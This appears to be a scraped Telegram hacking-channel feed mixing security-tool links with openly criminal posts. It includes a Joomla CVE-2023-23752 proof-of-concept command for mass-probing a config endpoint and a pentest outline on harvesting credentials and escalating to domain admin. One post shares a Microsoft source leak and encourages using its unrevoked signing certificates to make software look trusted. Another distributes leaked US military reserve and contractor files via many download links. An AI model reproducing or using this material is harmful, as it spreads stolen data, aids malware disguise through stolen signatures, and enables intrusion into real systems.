Cyber0жff666 λ
115 subscribers
167 photos
209 files
522 links
Cyber intelligence corporation.

C, C++, Assembly, UNIX, Malwares, Ransomwares, Information Security, Networks and Anonymity

new group link in: @intell666
Download Telegram
Crypto_Crime_Report_2023.pdf
43.4 MB
📓 The 2023 Crypto Crime Report
Everything you need to know about cryptocurrency-based crime
Arpoison and Ettercap are used to perform ARP poisoning.
​​Spark

Spark is a free, safe, open-source, web-based, cross-platform and full-featured RAT (Remote Administration Tool) that allow you to control all your devices via browser anywhere.

https://github.com/XZB-1248/Spark

#redteam
🦈 Приручаем акулу. Wireshark Mindmap.

• Многим из Вас знаком Wireshark — анализатор пакетов, программа номер один для сетевого анализа, траблшутинга, разработки программных и коммуникационных протоколов, а также всем, что связано с обучением нетворкингу.

• Для изучения и использования данного инструмента, предлагаю ознакомиться с очень полезной Mindmap, которая поможет сократить время при выполнении определенных задач: https://github.com/Ignitetechnologies/Mindmap

• P.S. Обязательно ознакомься с материалом "Лайфхаки на каждый день" и другой полезной информацией по хештегу #Wireshark.
Microsoft (source code) Leak

Source codes of the following Bing products, Bing Maps and Cortana. There are many digital signatures of Microsoft products in the leak. Many of them have not been recalled. Go ahead and your software will have the same level of trust as the original Microsoft product. Tell me about your successes.

DOWNLOAD!
👍1
1 - Information Gathering
Discover Network Hosts
Enumerate Listening Services
Discover Vulnerabilities


2 - Focused Penetration
Compromise Vulnerable Hosts (level 1)
[Exploit missing software patches]
[Deploy custom executable payloads]
[Acess remote management interfaces - RMI]


3 - Privilege Escalation
Estabilish Persistent Re-entry
Havest User Credentials
Pass Credentials to New Hosts(level 2)
[Identify privileged user accountd]
[Elevate to domain admin]


4 - Documentation
Gather Screenshots
Create Linear Attack Narratives
Create Final Deliverable

Enjoy
@CyberTemple
⭕️CVE-2023-23752
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
🔞 US military contractor files and Puerto Rican reserve files leak.

Details: The two files are sets of documents regarding the US military reserve in Puerto Rico and of contractors that work with the military. These were both obtained in 2022 and these have been leaked in response to the atrocious acts that US has been involved in all these years without regard for human lives.

➡️Download links(updated V2):
https://anonfiles.com/b29eud70y1/USArmyReservePR.part2_rar

https://anonfiles.com/WdB2t971y6/USArmyReservePR.part1_rar

https://drive.google.com/file/d/1ClMiJBbDrBWJWsXF2edpaq6LA7VCzszt/view?usp=sharing

➡️Backup links:
https://bayfiles.com/b05cw473yb/USArmyReservePR.part1_rar
https://bayfiles.com/d9r9x57eyd/USArmyReservePR.part2_rar
https://upload.st/DdNbw77aye/USArmyReservePR.part1_rar
https://upload.st/ubffx773y5/USArmyReservePR.part2_rar
👏1